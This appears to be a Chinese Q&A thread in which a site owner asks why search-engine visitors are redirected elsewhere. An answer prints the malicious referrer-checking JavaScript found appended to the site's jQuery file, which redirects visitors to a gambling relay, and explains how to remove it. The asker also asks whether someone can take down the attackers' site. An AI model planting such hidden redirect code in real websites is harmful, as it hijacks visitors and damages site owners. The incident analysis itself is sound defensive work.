被別的網站攻擊,首頁強制跳轉到另外網站去了,怎麼解決,求詳情?
在網上搜索 「cgwall」 跳轉到我的網站http://cgwall.cn,但是立刻又跳轉到別人網站上去了。 我在頁面上也沒發現有添加代碼和腳本,這個是怎麼回事,被攻擊了,那怎麼才能改好呢。有了解的人可以給個詳細一點的說明嗎?很急。
另外:我覺得這些人太沒素質了,欺負辛辛苦苦的小站,想把這個網站給弄掉,有人會嗎?實在是太生氣了。備註:直接輸入網址,或者搜別別的關鍵詞進網站,都是對的。
首先是問題結論,這是SEO作弊中很常見的referer作弊,屬於被黑的一種,比較常見的基本都是跳轉到博彩網站。為什麼通過搜索引擎訪問會跳轉,直接訪問不會跳轉,原因是從搜索引擎跳轉過去帶了referer,所以跳轉了;為什麼一定是搜索引擎,其他網站不行?因為這是一種針對搜索引擎或者一些大站做的黑帽SEO。具體關於幾種惡意網站中常見的被黑可以看我之前發在專欄的文章:談談那些被黑的網站,地址:http://zhuanlan.zhihu.com/fooying/19705511然後下來針對你這個網站做下分析:一般出現這種情況是因為頁面存在有問題的js,所以要處理這個問題先來看看你頁面的代碼,直接搜索載入的js,然後一個個打開看看,很容易在在你頁面找到了該鏈接:http://www.cgwall.cn/js/jquery-1.9.1.min.js打開在最底部可以看到一串代碼,明顯就是有問題的
var url = document.referrer;
if (url.indexOf("baidu") &>= 0 || url.indexOf("so") &>= 0 || url.indexOf("sogou") &>= 0 || url.indexOf("google") &>= 0 || url.indexOf("youdao") &>= 0 || url.indexOf("soso") &>= 0 || url.indexOf("bing") &>= 0 || url.indexOf("yahoo") &>= 0 || url.indexOf("ask") &>= 0 || url.indexOf("ebay") &>= 0 || url.indexOf("timewarner") &>= 0 || url.indexOf("naver") &>= 0 || url.indexOf("alibaba") &>= 0 || url.indexOf("yandex") &>= 0) {
var cnzz_protocol = (("https:" == document.location.protocol) ? " https://" : " http://");
document.write(unescape("%3Cspan id="cnzz_stat_icon_5845505"%3E%3C/span%3E%3Cscript src="" + cnzz_protocol + "s5.cnzz.com/stat.php%3Fid%3D5845505" type="text/javascript"%3E%3C/script%3E"));
window.location.href = "http://jump.myesball.com";
這下應該就很好看懂了,解讀下代碼:
讀取referer,如果referer網址中有包含幾個站點個關鍵詞,說明是從這些站點跳轉過來的,可以看到,支持百度、http://so.com、sogou、谷歌、有道、soso、binng、雅虎、ask、ebay等,大家可以試試這些站點之外的其他搜索引擎或站點,如中搜,就不會進行跳轉。然後獲取協議頭,同時在頁面中寫入一段代碼,這段代碼我們處理下:&&&
是一段統計代碼
最後的代碼應該大家很容易看懂,為什麼會跳原因就是它了:window.location.href = "http://jump.myesball.com";
頁面會先跳轉到http://jump.myesball.com/這個網址,就是一個中轉的跳轉網址,為什麼要弄個中轉網址呢?有個很直接的原因是,如果下次要跳轉的網址改了,直接改中轉網址跳轉到的頁面就可以了,就不用改代碼,因為下次網站的控制權不一定還在手上,但是也許惡意代碼還存在,就比如樓主,知道有問題,可能會去修網站漏洞,但是找不到這段代碼,就會一直還在。
中轉的代碼也簡單,大家一看就懂的: &< !DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" &>
&< html xmlns = "http://www.w3.org/1999/xhtml" &>
&< head &>
&< title &> 中轉站 &< /title&>
&
&< /head&>
&
&
簡單分析下,就是在頁面里寫入以下兩段代碼,應該是統計代碼,然後跳轉到目標的jumpUrl的網址。
&&&
&
所以代碼最終分析就是這樣。
解決方案:http://www.cgwall.cn/js/jquery-1.9.1.min.js里刪除那段惡意代碼然後網站應該存在漏洞,所以才會導致被黑,建議用CDN把,比如加速樂(加速樂 - 免費網站加速)、安全寶等然後也可以用安全聯盟站長平台(安全聯盟站長平台)檢查下漏洞,把漏洞處理掉把,實在不懂修復漏洞,可以找站長平台的修復專家,具體自己看網站,我就不多說了。---------------歡迎關注我的微信公眾號及知乎專欄微信公眾號:oxsafe
知乎專欄:微信公眾號:oxsafe by Fooying - 知乎專欄
感謝關注,如果覺得文章不錯就分享下
http://weixin.qq.com/r/5UMHH9-EH4JgrZt89xb3 (二維碼自動識別)
看看你的jquery.1.9.1.min.js尾部
我的網站也是啊,頭疼。http://www.qq196.com能不能幫我解決一下
如果是在流浪器輸入網址也跳轉是什麼原因呢?
找個批量清馬工具,檢查一下跳轉js語句,再把漏洞補了。
推薦閱讀:
※白帽子報告漏洞到底是為什麼?
※FreeBuf聚焦社會工程學:如何降低社會工程學威脅?
※各位自學網路安全的朋友們,你們的路線是什麼?
※如何評價 2016 年 3 月 1 日公布的 HTTPS DROWN Attack 漏洞?
※黑客小軟體等等自身會不會帶毒,對於初學者到底可不可以下載書上推薦的黑客小工具?